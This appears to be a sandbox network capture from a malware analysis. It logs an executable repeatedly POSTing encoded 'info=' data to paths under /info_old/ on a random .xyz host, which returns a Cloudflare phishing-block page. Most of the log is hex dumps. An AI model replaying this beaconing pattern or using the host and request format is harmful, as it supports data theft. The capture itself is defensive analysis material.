67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 53 75 73 70 65 63 74 65 64 20 70 68 69 73 68 69 6e 67 20 73 69 74 65 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 Data Ascii: 10d3<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site \| Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.5	49720	104.21.23.16	80	C:\Users\user\Desktop\N1yprTBBXs.exe

Timestamp	kBytes transferred	Direction	Data
Jan 29, 2021 17:38:46.580929995 CET	258	OUT	POST /info_old/w HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: application/x-www-form-urlencoded Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36 upgrade-insecure-requests: 1 Content-Length: 81 Host: 84cfba021a5a6662.xyz
Jan 29, 2021 17:38:46.580970049 CET	258	OUT	Data Raw: 69 6e 66 6f 3d 57 79 53 41 6e 62 58 6a 57 54 56 55 2d 51 62 38 74 50 46 55 69 49 63 37 71 61 73 54 53 41 70 4b 38 35 4b 2d 4a 71 42 34 57 79 32 77 30 67 6f 35 4c 5a 74 58 56 55 64 32 44 42 50 43 42 37 41 44 44 6f 33 57 55 36 55 50 67 67 38 7e Data Ascii: info=WySAnbXjWTVU-Qb8tPFUiIc7qasTSApK85K-JqB4Wy2w0go5LZtXVUd2DBPCB7ADDo3WU6UPgg8~
Jan 29, 2021 17:38:46.659503937 CET	259	IN	HTTP/1.1 200 OK Date: Fri, 29 Jan 2021 16:38:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: __cfduid=d1a284289fa3f4f3ff90e51abb2deb23a1611938326; expires=Sun, 28-Feb-21 16:38:46 GMT; path=/; domain=.84cfba021a5a6662.xyz; HttpOnly; SameSite=Lax X-Frame-Options: SAMEORIGIN cf-request-id: 07f09c00580000722de58a1000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=vj1Vqs2FD2NYSoF7uok2Ug7SdDHDX5%2FX7Ez6WiJ99y2YyDaBEodnTgwX9CBAamkhpvh1v76jR6iRD7K4QkgoGmEzhqLiYIWIZ7T4LaNf3Nxe6Owv4A%3D%3D"}],"max_age":604800,"group":"cf-nel"} NEL: {"max_age":604800,"report_to":"cf-nel"} Server: cloudflare CF-RAY: 619462ad5858722d-AMS Data Raw: 31 30 64 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 53 75 73 70 65 63 74 65 64 20 70 68 69 73 68 69 6e 67 20 73 69 74 65 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f Data Ascii: 10d3<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site \| Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" co
Jan 29, 2021 17:38:46.659538031 CET	261	IN	Data Raw: 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 69 64 3d 22 63 66 5f 73 74 79 6c 65 73 Data Ascii: ntent="width=device-width,initial-scale=1" /><link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" type="text/css" media="screen,projection" />...[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-
Jan 29, 2021 17:38:46.659560919 CET	262	IN	Data Raw: 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 63 6f 6c 75 6d 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 32 3e 57 68 61 74 20 69 73 20 70 68 69 73 68 69 6e 67 3f 3c 2f 68 32 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: <div class="cf-column"> <h2>What is phishing?</h2> <p>This link has been flagged as phishing. Phishing is an attempt to acquire personal information such as passwords and credit card details by pretending to be
Jan 29, 2021 17:38:46.659573078 CET	263	IN	Data Raw: 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 2e 73 65 63 74 69 6f 6e 20 2d 2d 3e 0a 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 66 6f 6f 74 65 72 Data Ascii: > </div> </div>... /.section --> <div class="cf-error-footer cf-wrapper w-240 lg:w-full py-10 sm:py-4 sm:px-8 mx-auto text-center sm:text-left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <sp
Jan 29, 2021 17:38:46.659586906 CET	263	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Jan 29, 2021 17:38:57.523209095 CET	606	OUT	POST /info_old/e HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: application/x-www-form-urlencoded Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36 upgrade-insecure-requests: 1 Content-Length: 677 Host: 84cfba021a5a6662.xyz
Jan 29, 2021 17:38:57.523325920 CET	606	OUT	Data Raw: 69 6e 66 6f 3d 57 79 53 41 6e 62 58 6a 57 54 57 38 59 47 58 55 47 63 4a 56 39 58 51 4b 71 76 58 43 49 31 41 6d 57 44 42 4a 6a 34 55 2d 67 31 57 4b 52 76 6e 78 54 73 63 77 64 75 46 54 32 42 66 43 58 67 67 30 68 37 53 78 71 61 74 6c 61 33 6e 67 38 Data Ascii: info=WySAnbXjWTW8YGXUGcJV9XQKqvXCI1AmWDBJj4U-g1WKRvnxTscwduFT2BfCXgg0h7Sxqatla3ng8ukL-pl8Dr8N8HqDpScYTbUy6uw5ZL-MPhpTNUsvoyOqifmBCVQiT6Y7NpBzPsi912F8WNCFScT8b-uWJRUCEPgr_QY2cinQd9sNw2c_3TQDzSqhX4WKYPwaiFyLCUTMojROHTa1EECTRm3aGKyWGwr5K8DJV4r30i
Jan 29, 2021 17:38:57.578520060 CET	608	IN	HTTP/1.1 200 OK Date: Fri, 29 Jan 2021 16:38:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: __cfduid=d0c77f8ee470537dddd2ec92d793e6cef1611938337; expires=Sun, 28-Feb-21 16:38:57 GMT; path=/; domain=.84cfba021a5a6662.xyz; HttpOnly; SameSite=Lax X-Frame-Options: SAMEORIGIN cf-request-id: 07f09c2b1b0000722de5b61000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=%2BZOJ1cnVLyD8bjwQnQt99GunNGqbpH1vv7YKluExGYIR1FU%2B2y4iFkkwUc2YSO3VbUXGZV3xWKV%2BVmTFtD9bZvArPsHP%2Bg7ZOzCaA4jBLLoue8wa1Q%3D%3D"}],"max_age":604800,"group":"cf-nel"} NEL: {"max_age":604800,"report_to":"cf-nel"} Server: cloudflare CF-RAY: 619462f1bd2b722d-AMS Data Raw: 31 30 64 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 53 75 73 70 65 63 74 65 64 20 70 68 69 73 68 69 6e 67 20 73 69 74 65 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f Data Ascii: 10d3<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site \| Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /><meta name="robots" content="noindex, nofollow" /><meta name="viewpo
Jan 29, 2021 17:38:57.578546047 CET	609	IN	Data Raw: 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 69 64 3d 22 63 66 5f Data Ascii: rt" content="width=device-width,initial-scale=1" /><link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" type="text/css" media="screen,projection" />...[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href=
Jan 29, 2021 17:38:57.578562975 CET	611	IN	Data Raw: 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 63 6f 6c 75 6d 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 32 3e 57 68 61 74 20 69 73 20 70 68 69 73 68 69 6e 67 3f 3c 2f 68 32 3e 0a 0a 20 20 20 20 20 Data Ascii: "> <div class="cf-column"> <h2>What is phishing?</h2> <p>This link has been flagged as phishing. Phishing is an attempt to acquire personal information such as passwords and credit card details by pretending
Jan 29, 2021 17:38:57.578577995 CET	612	IN	Data Raw: 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 2e 73 65 63 74 69 6f 6e 20 2d 2d 3e 0a 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d Data Ascii: </div> </div> </div>... /.section --> <div class="cf-error-footer cf-wrapper w-240 lg:w-full py-10 sm:py-4 sm:px-8 mx-auto text-center sm:text-left border-solid border-0 border-t border-gray-300"> <p class="text-13">
Jan 29, 2021 17:38:57.578589916 CET	612	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Jan 29, 2021 17:38:57.634712934 CET	612	OUT	POST /info_old/w HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: application/x-www-form-urlencoded Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36 upgrade-insecure-requests: 1 Content-Length: 81 Host: 84cfba021a5a6662.xyz
Jan 29, 2021 17:38:57.634824038 CET	613	OUT	Data Raw: 69 6e 66 6f 3d 57 79 53 41 6e 62 58 6a 57 54 56 55 2d 51 62 38 74 50 46 55 69 49 63 37 71 61 73 54 53 41 70 4b 38 35 4b 2d 4a 71 42 34 57 79 32 77 30 67 6f 35 4c 5a 74 58 56 59 78 79 52 74 30 2d 55 66 67 31 55 39 49 4e 49 4d 43 39 70 39 77 7e Data Ascii: info=WySAnbXjWTVU-Qb8tPFUiIc7qasTSApK85K-JqB4Wy2w0go5LZtXVYxyRt0-Ufg1U9INIMC9p9w~
Jan 29, 2021 17:38:57.693810940 CET	614	IN	HTTP/1.1 200 OK Date: Fri, 29 Jan 2021 16:38:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: __cfduid=d0c77f8ee470537dddd2ec92d793e6cef1611938337; expires=Sun, 28-Feb-21 16:38:57 GMT; path=/; domain=.84cfba021a5a6662.xyz; HttpOnly; SameSite=Lax X-Frame-Options: SAMEORIGIN cf-request-id: 07f09c2b8e0000722de28e5000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=TltZmQ4ZAgCnC4XZHARQuJ6c3SjymJnZnZrmM9mXZoJeXnjrEWuI%2FMrWj8lYOCOeNeO%2BRY2jk3uPLxZ4AMtf9xZFwNzvgcohA4k8gWqE5jaNMamf6Q%3D%3D"}],"max_age":604800,"group":"cf-nel"} NEL: {"max_age":604800,"report_to":"cf-nel"} Server: cloudflare CF-RAY: 619462f27def722d-AMS Data Raw: 31 30 64 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 53 75 73 70 65 63 74 65 64 20 70 68 69 73 68 69 6e 67 20 73 69 74 65 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 Data Ascii: 10d3<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site \| Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport"
Jan 29, 2021 17:38:57.693840027 CET	615	IN	Data Raw: 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 69 64 3d 22 63 66 5f 73 74 79 6c Data Ascii: content="width=device-width,initial-scale=1" /><link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" type="text/css" media="screen,projection" />...[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cd
Jan 29, 2021 17:38:57.694220066 CET	617	IN	Data Raw: 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 63 6f 6c 75 6d 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 32 3e 57 68 61 74 20 69 73 20 70 68 69 73 68 69 6e 67 3f 3c 2f 68 32 3e 0a 0a 20 20 20 20 20 20 20 20 20 Data Ascii: <div class="cf-column"> <h2>What is phishing?</h2> <p>This link has been flagged as phishing. Phishing is an attempt to acquire personal information such as passwords and credit card details by pretending to b
Jan 29, 2021 17:38:58.145667076 CET	624	OUT	POST /info_old/g HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: application/x-www-form-urlencoded Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36 upgrade-insecure-requests: 1 Content-Length: 1393 Host: 84cfba021a5a6662.xyz
Jan 29, 2021 17:38:58.145747900 CET	625	OUT	Data Raw: 69 6e 66 6f 3d 57 79 53 41 6e 62 58 6a 57 54 57 38 59 47 58 55 47 63 4a 56 39 58 51 4b 71 76 58 43 49 31 41 6d 57 44 42 4a 6a 34 55 2d 67 31 57 4b 52 76 6e 78 54 73 63 77 64 75 46 54 32 42 66 43 58 67 67 30 68 37 53 78 71 61 74 6c 61 33 6e 67 38 Data Ascii: info=WySAnbXjWTW8YGXUGcJV9XQKqvXCI1AmWDBJj4U-g1WKRvnxTscwduFT2BfCXgg0h7Sxqatla3ng8ukL-pl8Dr8N8HqDpScYTbUy6uw5ZL9dPu8tHcojNuCBF8eIzti4Vho2kjGOlZLWPpAmv1ZvQ0m-fNMyJBD174tp0UlzzJOpo86hSdKCdUttUdEpqJPwwrnFsdl_TfL4womc76QP-MZzjcPY7uGheIZ8B3_edDyOuY
Jan 29, 2021 17:38:58.201672077 CET	627	IN	HTTP/1.1 200 OK Date: Fri, 29 Jan 2021 16:38:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: __cfduid=d20309c657c3aa8033289bcf78fb7eb2f1611938338; expires=Sun, 28-Feb-21 16:38:58 GMT; path=/; domain=.84cfba021a5a6662.xyz; HttpOnly; SameSite=Lax X-Frame-Options: SAMEORIGIN cf-request-id: 07f09c2d860000722ded166000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=wwZW7r1Jc28fPnL8KXVfjpY1Ziyt%2BVfRG01K4TjvhT5qwKsR7RJ21bq397U3d2CIwET%2BOZMYmtfYXfvyyTFQdNjTJZFM6R80dsGHyFuHHl4IPtLkQA%3D%3D"}],"max_age":604800,"group":"cf-nel"} NEL: {"max_age":604800,"report_to":"cf-nel"} Server: cloudflare CF-RAY: 619462f5af7b722d-AMS Data Raw: 31 30 64 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 